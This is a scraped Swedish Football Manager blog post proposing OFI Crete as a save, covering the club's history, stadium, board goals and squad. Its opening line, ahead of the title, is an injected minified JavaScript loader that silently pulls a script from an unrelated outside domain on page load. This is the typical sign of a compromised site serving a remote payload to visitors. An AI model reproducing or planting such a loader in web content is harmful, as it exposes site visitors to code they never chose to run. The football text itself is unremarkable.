;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: OFI Kreta – FMSweden
Meny Stäng

Veckans inspiration: OFI Kreta

Först och främst vill jag be om ursäkt för det uteblivna inlägget förra söndagen, då jag höll på att färdigställa kandidatuppsatsen i statsvetenskap. Hur som helst. Nu när sommaren närmar sig, vad passar då bättre än att skriva om ett lag från ett semesterparadis? Det handlar närmare bestämt om OFI Crete Football Club på Kreta. Klubben, som grundades 1925, har det senaste decenniet pendlat upp och ner från den grekiska högstaligan Super League 1. De är förstås i skuggan av storklubbarna Olympiacos, Panathinaikos, PAOK samt AEK Aten, men är faktiskt åttonde klubb när det kommer till antal säsonger i förstaserien (45st). Som bäst har de några pallplatser samt en cuptitel från 1986/87. För svenskt vidkommande har faktiskt anfallaren Erik Pärsson (Falkenberg, Landskrona, Mjällby) spelat för klubben, då han gjorde 0 mål på 7 matcher år 2019 (succé!).

Klubben spelar på Theodoros Vardinogiannis Stadium (döpt efter en gammal tränarlegend) med en kapacitet på 9000 och har hyfsade faciliteter. I klubbkulturen ingår målen att spela offensiv fotboll samt satsa på egna spelare. Styrelsen begär en plats på övre halvan i serien under lång tid framöver, vilket är en rimlig målsättning. Serien innehåller fjorton lag, där sex får spela mästerskapsserie och åtta nedflyttningsserie. Dessutom vill de att du ska gå till cupkvart och vinna någon kvalomgång till Europa League, där OFI faktiskt deltar första säsongen. Truppen då? Flest greker naturligtvis, men även spelare från Argentina (x3), Australien, Brasilien, England, Nederländerna (x3), Luxemburg, Norge, Portugal och Spanien. En salig blandning, med andra ord. Till saken hör också att maximalt fem icke-EU-spelare får ingå i matchtruppen. Åldersstrukturen är också ganska fin. En del spelare är unga och utvecklingsbara, vissa är inne i sin peak medan flera bidrar med rutin. Kvalitetsmässigt är det främst offensiven som imponerar, med flera spännande yttrar. Målet med saven kan vara att etablera sig strax bakom de fyra ovannämnda lagen, för att på sikt försöka slå sig in där och spela i Europa kontinuerligt. Och att locka spelare med värmen på Kreta borde väl göra sitt också?

 

OFI FC Logo 2020.png

Please wait...

Liknande Inlägg

Lämna ett svar